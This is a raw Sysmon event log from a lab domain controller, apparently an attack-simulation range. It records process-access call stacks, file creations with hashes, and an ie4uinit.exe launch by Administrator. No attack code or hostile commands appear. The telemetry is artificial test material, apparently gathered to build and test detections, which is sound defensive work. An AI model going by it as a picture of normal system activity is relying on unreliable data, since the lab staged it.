12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.130{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6EBDC0A414534760B4D6A951E221A9,SHA256=FC99A037C47538EDDD9F47327D8D595F3F53BF72E6B8A17BD2558DE62707C662,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\shsvcs.dll+11f99|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.114{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x101068C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\shsvcs.dll+11f27|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.099{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.099{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+22dbaa|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.102{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.943{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.921{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9920.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.921{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI98C1.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.827{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI98C1.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.827{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9824.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.672{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9824.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.640{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C43C2C65CFBBF6E5365FE6BF3931672,SHA256=BB5C5C530297D1C66FAF194C933B82C9DCBB521F5DBC8C6D67426B053CE78ECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.609{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1707E8466BA4D6D9DC4A28DECA5B22A,SHA256=3A9C929E2BE2084F8AEFECFD996D8261678EA331D49791983BA1109BD12AC890,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 